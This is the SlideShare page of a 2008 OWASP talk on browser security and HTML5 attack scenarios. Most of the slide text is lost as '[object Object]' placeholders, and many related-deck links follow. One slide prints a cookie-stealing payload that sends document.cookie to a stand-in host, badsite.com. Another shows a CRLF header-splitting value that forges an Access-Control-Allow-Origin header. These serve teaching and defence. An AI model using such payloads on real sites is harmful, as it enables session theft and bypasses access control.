SlideShare una empresa de Scribd logo

Browser Security

Descargar como PPT, PDF
Roberto Suggi Liverani
Roberto Suggi Liverani

This talk is a generic but comprehensive overview of security mechanism, controls and potential attacks in modern browsers. The talk focuses also on new technologies, such as HTML5 and related APIs to highlight new attack scenario against browsers.

Tecnología
1 de 28
OWASP – Browser Security Roberto Suggi Liverani Security Consultant Security-Assessment.com 3 September 2008
Who am I? ,[object Object],[object Object],[object Object],[object Object]
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Introduction ,[object Object],[object Object]
Introduction ,[object Object],[object Object]
Introduction ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Next Challenges ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
HMTL5 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],y.hello.com x.hello.com XSS Injection document.domain = hello.com Communication between 2 subdomains through XSS
HTML5 ,[object Object],[object Object],[object Object],[object Object],Malicious Third party 3.COM (b) Iframe injection src=2.COM 1.COM (vulnerable) Cross Context Scripting between 2.COM and 3.COM (a) Injection in 1.COM of document.open pointing to 3.COM
HTML5 ,[object Object],[object Object],[object Object],A.COM B.COM ,[object Object],[object Object],Test.foo served as text/foo redirection to: http://a.com/foo?url=b.com/test.foo
HTML5 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
HTML5 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
HTML5 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
HTML5 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
HTML5 ,[object Object],[object Object],[object Object],[object Object],[object Object]
HTML5 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],A.COM B.COM var o = document.getElementsByTagName('iframe')[0]; o.contentWindow.postMessage('Hello world', 'http://b.com/'); NOTE: this condition can be omitted or = *
HTML5 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],<eventsource> data: http://www.google.com/news/1 data: http://www.yahoo/com/news/3 data: http://bbc.co.uk/news/2 EventStream PULLS
HTML5 ,[object Object],BOTNET badsite.com/evil.php ,[object Object],[object Object],Data Stream (MIME: text/event-stream) Data: wait(); Data: wait(); Data: document.write(<img src=‘http://badsite.com/’+document.cookie); Botnet operates following XHR access control for data exchange
HTML5 ,[object Object],[object Object],Client at 123.com Server at aa.com GET ws://aa.com/ HTTP/1.1 Upgrade: WebSocket Connection: Upgrade Host: 123.com Origin: http://123.com Authorization: Basic d2FsbGU6ZXZl HTTP/1.1 101 Web Socket Protocol Handshake Upgrade: WebSocket Connection: Upgrade WebSocket-Origin: http://aa.com WebSocket-Location: ws://aa.com:80/ Data Framing Read/send data byte per byte Data Framing Send/read raw UTF8 data byte per byte Close TCP/IP connection – no handshake Close TCP/IP connection – no handshake
WebApps (XHR) ,[object Object],Resource: aaa.com/test.txt Client: bbb.com JavaScript + XHR: new client = new XMLHttpRequest(); client.open(&quot;GET or POST&quot;, &quot;http://aaa.com/test.txt&quot;) client.onreadystatechange = function() { /* do something */ } client.send() HTTP Response: Access-Control-Allow-Origin: http://bbb.com Hello World! GET NOTE: the entire access control system relies on HTTP headers So what happens with an HTTP Splitting Attack? JavaScript + XHR: new client = new XMLHttpRequest(); client.open(&quot;GET or POST&quot;, &quot;http://aaa.com/test.txt %0A%0DAccess-Control-Allow-Origin: http://bbb.com%0a%0d%0a%0d &quot;) client.onreadystatechange = function() { /* do something */ } client.send()
WebApps (XHR) ,[object Object],Resource: aaa.com/test.txt Client: bbb.com JavaScript + XHR: new client = new XMLHttpRequest(); client.open(“OPTIONS&quot;, &quot;http://aaa.com/test.txt&quot;) client.onreadystatechange = function() { /* do something */ } client.send() HTTP Response: Access-Control-Allow-Origin: http://bbb.com Access-Control-Max-Age: 3628800 Preflight Request: OPTIONS JavaScript + XHR: new client = new XMLHttpRequest(); client.open(“DELETE&quot;, &quot;http://aaa.com/test.txt&quot;) client.onreadystatechange = function() { /* do something */ } client.send() DELETE NOTE: the entire access control system relies on HTTP headers
XHR Alternative – XDR (Xdomain Request) ,[object Object],Resource: aaa.com/xdr.txt Client: bbb.com JavaScript + XDR: xdr = new XDomainRequest(); xdr.open(“GET&quot;, “http://www.aaa.com/xdr.txt&quot;) HTTP Response: XDomainRequestAllowed=1 Hello! GET HTTP Request: GET /xdr.txt XDomainRequest: 1 Host: bbb.com NOTE: the entire XDR relies on HTTP headers
Browser Plugins ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Browser Plugins ,[object Object],[object Object],[object Object],test.addEventListener(MouseEvent.CLICK, downloadFile); var fileRef:FileReference = new FileReference(); function downloadFile(event:MouseEvent):void { fileRef.download(new URLRequest(&quot;http://www.aaa.com/file.html&quot;), “file.html&quot;); }
OWASP Intrinsic Group ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Questions? ,[object Object],[object Object],[object Object]
References ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
References ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Recomendados

Browser Security by pratimesh Pathak ( Buldhana)
Browser Security by pratimesh Pathak ( Buldhana) Browser Security by pratimesh Pathak ( Buldhana)
Browser Security by pratimesh Pathak ( Buldhana) Pratimesh Pathak
 
cellphone virus and security
cellphone virus and securitycellphone virus and security
cellphone virus and securityAkhil Kumar
 
Mobile security in Cyber Security
Mobile security in Cyber SecurityMobile security in Cyber Security
Mobile security in Cyber SecurityGeo Marian
 
Mobile security
Mobile securityMobile security
Mobile securitydilipdubey5
 
Mobile Security
Mobile SecurityMobile Security
Mobile SecurityMarketingArrowECS_CZ
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application SecurityIshan Girdhar
 
Network security
Network securityNetwork security
Network securitymena kaheel
 
Two factor authentication presentation mcit
Two factor authentication presentation mcitTwo factor authentication presentation mcit
Two factor authentication presentation mcitmmubashirkhan
 

Recomendados

Browser Security by pratimesh Pathak ( Buldhana)
Browser Security by pratimesh Pathak ( Buldhana) Browser Security by pratimesh Pathak ( Buldhana)
Browser Security by pratimesh Pathak ( Buldhana) Pratimesh Pathak
 
cellphone virus and security
cellphone virus and securitycellphone virus and security
cellphone virus and securityAkhil Kumar
 
Mobile security in Cyber Security
Mobile security in Cyber SecurityMobile security in Cyber Security
Mobile security in Cyber SecurityGeo Marian
 
Mobile security
Mobile securityMobile security
Mobile securitydilipdubey5
 
Mobile Security
Mobile SecurityMobile Security
Mobile SecurityMarketingArrowECS_CZ
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application SecurityIshan Girdhar
 
Network security
Network securityNetwork security
Network securitymena kaheel
 
Two factor authentication presentation mcit
Two factor authentication presentation mcitTwo factor authentication presentation mcit
Two factor authentication presentation mcitmmubashirkhan
 
I - Mode Technology
I - Mode TechnologyI - Mode Technology
I - Mode Technologyvasanthimuniasamy
 
Basics of Denial of Service Attacks
Basics of Denial of Service AttacksBasics of Denial of Service Attacks
Basics of Denial of Service AttacksHansa Nidushan
 
Trojan horse
Trojan horseTrojan horse
Trojan horseGaurang Rathod
 
Mobile security
Mobile securityMobile security
Mobile securityNaveen Kumar
 
Wireless network security
Wireless network securityWireless network security
Wireless network securityVishal Agarwal
 
Wireless Hacking
Wireless HackingWireless Hacking
Wireless HackingVIKAS SINGH BHADOURIA
 
Wireless security presentation
Wireless security presentationWireless security presentation
Wireless security presentationMuhammad Zia
 
Spyware
SpywareSpyware
SpywareBabur Rahmadi
 
Virus and worms
Virus and wormsVirus and worms
Virus and wormsVikas Sharma
 
Ransomware
RansomwareRansomware
RansomwareAkshita Pillai
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
Graphical password authentication
Graphical password authenticationGraphical password authentication
Graphical password authenticationAsim Kumar Pathak
 
I-Mode TECHNOLOGY
I-Mode TECHNOLOGYI-Mode TECHNOLOGY
I-Mode TECHNOLOGYArun P Raju
 
Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Fabiha Shahzad
 
Cyber crime & security
Cyber crime & securityCyber crime & security
Cyber crime & securityRonson Fernandes
 
Mobile security
Mobile securityMobile security
Mobile securityTapan Khilar
 
Cyber security with ai
Cyber security with aiCyber security with ai
Cyber security with aiBurhan Ahmed
 
Mobile Security
Mobile SecurityMobile Security
Mobile SecurityXavier Mertens
 
Smartphone security
Smartphone securitySmartphone security
Smartphone securityManish Gupta
 
Android Operating System
Android Operating SystemAndroid Operating System
Android Operating SystemBilal Mirza
 
Browser security — ROOTS
Browser security — ROOTSBrowser security — ROOTS
Browser security — ROOTSAndre N. Klingsheim
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101 Stormpath
 

Más contenido relacionado

La actualidad más candente

Basics of Denial of Service Attacks
Basics of Denial of Service AttacksBasics of Denial of Service Attacks
Basics of Denial of Service AttacksHansa Nidushan
 
Wireless network security
Wireless network securityWireless network security
Wireless network securityVishal Agarwal
 
Wireless security presentation
Wireless security presentationWireless security presentation
Wireless security presentationMuhammad Zia
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
Graphical password authentication
Graphical password authenticationGraphical password authentication
Graphical password authenticationAsim Kumar Pathak
 
I-Mode TECHNOLOGY
I-Mode TECHNOLOGYI-Mode TECHNOLOGY
I-Mode TECHNOLOGYArun P Raju
 
Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Fabiha Shahzad
 
Cyber security with ai
Cyber security with aiCyber security with ai
Cyber security with aiBurhan Ahmed
 
Smartphone security
Smartphone securitySmartphone security
Smartphone securityManish Gupta
 
Android Operating System
Android Operating SystemAndroid Operating System
Android Operating SystemBilal Mirza
 

La actualidad más candente (20)

I - Mode Technology
I - Mode TechnologyI - Mode Technology
I - Mode Technology
 
Basics of Denial of Service Attacks
Basics of Denial of Service AttacksBasics of Denial of Service Attacks
Basics of Denial of Service Attacks
 
Trojan horse
Trojan horseTrojan horse
Trojan horse
 
Mobile security
Mobile securityMobile security
Mobile security
 
Wireless network security
Wireless network securityWireless network security
Wireless network security
 
Wireless Hacking
Wireless HackingWireless Hacking
Wireless Hacking
 
Wireless security presentation
Wireless security presentationWireless security presentation
Wireless security presentation
 
Spyware
SpywareSpyware
Spyware
 
Virus and worms
Virus and wormsVirus and worms
Virus and worms
 
Ransomware
RansomwareRansomware
Ransomware
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
 
Graphical password authentication
Graphical password authenticationGraphical password authentication
Graphical password authentication
 
I-Mode TECHNOLOGY
I-Mode TECHNOLOGYI-Mode TECHNOLOGY
I-Mode TECHNOLOGY
 
Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)
 
Cyber crime & security
Cyber crime & securityCyber crime & security
Cyber crime & security
 
Mobile security
Mobile securityMobile security
Mobile security
 
Cyber security with ai
Cyber security with aiCyber security with ai
Cyber security with ai
 
Mobile Security
Mobile SecurityMobile Security
Mobile Security
 
Smartphone security
Smartphone securitySmartphone security
Smartphone security
 
Android Operating System
Android Operating SystemAndroid Operating System
Android Operating System
 

Destacado

Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101 Stormpath
 
Web Browser Security - 2016 Comparative Test Results
Web Browser Security - 2016 Comparative Test ResultsWeb Browser Security - 2016 Comparative Test Results
Web Browser Security - 2016 Comparative Test ResultsNSS Labs
 
Web browser privacy and security
Web browser privacy and security Web browser privacy and security
Web browser privacy and security amiable_indian
 
Trusteer Rapport – Browser Security - How It Works
Trusteer Rapport – Browser Security - How It WorksTrusteer Rapport – Browser Security - How It Works
Trusteer Rapport – Browser Security - How It Workstrusteer
 
Best topics for seminar
Best topics for seminarBest topics for seminar
Best topics for seminarshilpi nagpal
 
Internet security powerpoint
Internet security powerpointInternet security powerpoint
Internet security powerpointArifa Ali
 
Software reuse ppt.
Software reuse ppt.Software reuse ppt.
Software reuse ppt.Sumit Biswas
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Securing Web Applications with Token Authentication
Securing Web Applications with Token AuthenticationSecuring Web Applications with Token Authentication
Securing Web Applications with Token AuthenticationStormpath
 
Google chrome operating system
Google chrome operating systemGoogle chrome operating system
Google chrome operating systemkondalarao7
 

Destacado (20)

Browser security — ROOTS
Browser security — ROOTSBrowser security — ROOTS
Browser security — ROOTS
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101
 
Web Security
Web SecurityWeb Security
Web Security
 
Web Browser Security - 2016 Comparative Test Results
Web Browser Security - 2016 Comparative Test ResultsWeb Browser Security - 2016 Comparative Test Results
Web Browser Security - 2016 Comparative Test Results
 
Web Browsers
Web BrowsersWeb Browsers
Web Browsers
 
Web browser privacy and security
Web browser privacy and security Web browser privacy and security
Web browser privacy and security
 
Trusteer Rapport – Browser Security - How It Works
Trusteer Rapport – Browser Security - How It WorksTrusteer Rapport – Browser Security - How It Works
Trusteer Rapport – Browser Security - How It Works
 
Best topics for seminar
Best topics for seminarBest topics for seminar
Best topics for seminar
 
Internet Security
Internet SecurityInternet Security
Internet Security
 
Internet security powerpoint
Internet security powerpointInternet security powerpoint
Internet security powerpoint
 
Software reuse ppt.
Software reuse ppt.Software reuse ppt.
Software reuse ppt.
 
Digital Cinema
Digital CinemaDigital Cinema
Digital Cinema
 
Chrome O.S.
Chrome O.S.Chrome O.S.
Chrome O.S.
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Securing Web Applications with Token Authentication
Securing Web Applications with Token AuthenticationSecuring Web Applications with Token Authentication
Securing Web Applications with Token Authentication
 
Google chrome operating system
Google chrome operating systemGoogle chrome operating system
Google chrome operating system
 
Internet Security
Internet SecurityInternet Security
Internet Security
 
Web browser
Web browserWeb browser
Web browser
 
Web Browsers
Web BrowsersWeb Browsers
Web Browsers
 
5 pen pc technology
5 pen pc technology5 pen pc technology
5 pen pc technology
 

Similar a Browser Security

Browser security
Browser securityBrowser security
Browser securityUday Anand
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5DefconRussia
 
Web Browsers And Other Mistakes
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakesguest2821a2
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Jeremiah Grossman
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdfssuser01066a
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoShreeraj Shah
 
Web Browsers And Other Mistakes
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakeskuza55
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Krzysztof Kotowicz
 
V2 peter-lubbers-sf-jug-websocket
V2 peter-lubbers-sf-jug-websocketV2 peter-lubbers-sf-jug-websocket
V2 peter-lubbers-sf-jug-websocketbrent bucci
 
01. http basics v27
01. http basics v2701. http basics v27
01. http basics v27Eoin Keary
 
XST - Cross Site Tracing
XST - Cross Site TracingXST - Cross Site Tracing
XST - Cross Site TracingMagno Logan
 
JavaScript Security: Mastering Cross Domain Communications in complex JS appl...
JavaScript Security: Mastering Cross Domain Communications in complex JS appl...JavaScript Security: Mastering Cross Domain Communications in complex JS appl...
JavaScript Security: Mastering Cross Domain Communications in complex JS appl...Thomas Witt
 
Introduction to Web Architecture
Introduction to Web ArchitectureIntroduction to Web Architecture
Introduction to Web ArchitectureChamnap Chhorn
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Securitychuckbt
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Html intake 38 lect1
Html intake 38 lect1Html intake 38 lect1
Html intake 38 lect1ghkadous
 
Message in a Bottle
Message in a BottleMessage in a Bottle
Message in a BottleZohar Arad
 

Similar a Browser Security (20)

Browser security
Browser securityBrowser security
Browser security
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
 
Web Browsers And Other Mistakes
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakes
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
 
Web Browsers And Other Mistakes
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakes
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
 
V2 peter-lubbers-sf-jug-websocket
V2 peter-lubbers-sf-jug-websocketV2 peter-lubbers-sf-jug-websocket
V2 peter-lubbers-sf-jug-websocket
 
01. http basics v27
01. http basics v2701. http basics v27
01. http basics v27
 
XST - Cross Site Tracing
XST - Cross Site TracingXST - Cross Site Tracing
XST - Cross Site Tracing
 
JavaScript Security: Mastering Cross Domain Communications in complex JS appl...
JavaScript Security: Mastering Cross Domain Communications in complex JS appl...JavaScript Security: Mastering Cross Domain Communications in complex JS appl...
JavaScript Security: Mastering Cross Domain Communications in complex JS appl...
 
Introduction to Web Architecture
Introduction to Web ArchitectureIntroduction to Web Architecture
Introduction to Web Architecture
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Security
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Html intake 38 lect1
Html intake 38 lect1Html intake 38 lect1
Html intake 38 lect1
 
5-WebServers.ppt
5-WebServers.ppt5-WebServers.ppt
5-WebServers.ppt
 
5-WebServers.ppt
5-WebServers.ppt5-WebServers.ppt
5-WebServers.ppt
 
Message in a Bottle
Message in a BottleMessage in a Bottle
Message in a Bottle
 

Más de Roberto Suggi Liverani

I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of themRoberto Suggi Liverani
 
Cross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationRoberto Suggi Liverani
 
Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Roberto Suggi Liverani
 
None More Black - the Dark Side of SEO
None More Black - the Dark Side of SEONone More Black - the Dark Side of SEO
None More Black - the Dark Side of SEORoberto Suggi Liverani
 
Bridging the gap - Security and Software Testing
Bridging the gap - Security and Software TestingBridging the gap - Security and Software Testing
Bridging the gap - Security and Software TestingRoberto Suggi Liverani
 
Defending Against Application DoS attacks
Defending Against Application DoS attacksDefending Against Application DoS attacks
Defending Against Application DoS attacksRoberto Suggi Liverani
 
Black Energy18 - Russian botnet package analysis
Black Energy18 - Russian botnet package analysisBlack Energy18 - Russian botnet package analysis
Black Energy18 - Russian botnet package analysisRoberto Suggi Liverani
 

Más de Roberto Suggi Liverani (13)

I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
 
Augmented reality in your web proxy
Augmented reality in your web proxyAugmented reality in your web proxy
Augmented reality in your web proxy
 
Cross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitation
 
Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012
 
None More Black - the Dark Side of SEO
None More Black - the Dark Side of SEONone More Black - the Dark Side of SEO
None More Black - the Dark Side of SEO
 
Bridging the gap - Security and Software Testing
Bridging the gap - Security and Software TestingBridging the gap - Security and Software Testing
Bridging the gap - Security and Software Testing
 
Defending Against Application DoS attacks
Defending Against Application DoS attacksDefending Against Application DoS attacks
Defending Against Application DoS attacks
 
Exploiting Firefox Extensions
Exploiting Firefox ExtensionsExploiting Firefox Extensions
Exploiting Firefox Extensions
 
Black Energy18 - Russian botnet package analysis
Black Energy18 - Russian botnet package analysisBlack Energy18 - Russian botnet package analysis
Black Energy18 - Russian botnet package analysis
 
XPath Injection
XPath InjectionXPath Injection
XPath Injection
 
Web Spam Techniques
Web Spam TechniquesWeb Spam Techniques
Web Spam Techniques
 
Reversing JavaScript
Reversing JavaScriptReversing JavaScript
Reversing JavaScript
 
Ajax Security
Ajax SecurityAjax Security
Ajax Security
 

Último

TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 

Último (20)

TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
